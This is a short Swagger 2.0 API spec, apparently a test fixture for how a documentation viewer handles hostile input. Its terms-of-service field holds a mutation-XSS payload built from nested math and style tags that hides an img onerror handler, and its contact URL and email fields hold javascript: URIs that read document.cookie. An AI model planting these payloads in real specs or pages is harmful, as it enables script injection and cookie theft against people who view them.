swagger: "2.0"
info:
  title: "Swagger Sample App"
  description: "Please to click Terms of service"
  termsOfService: <math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">
  contact:
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
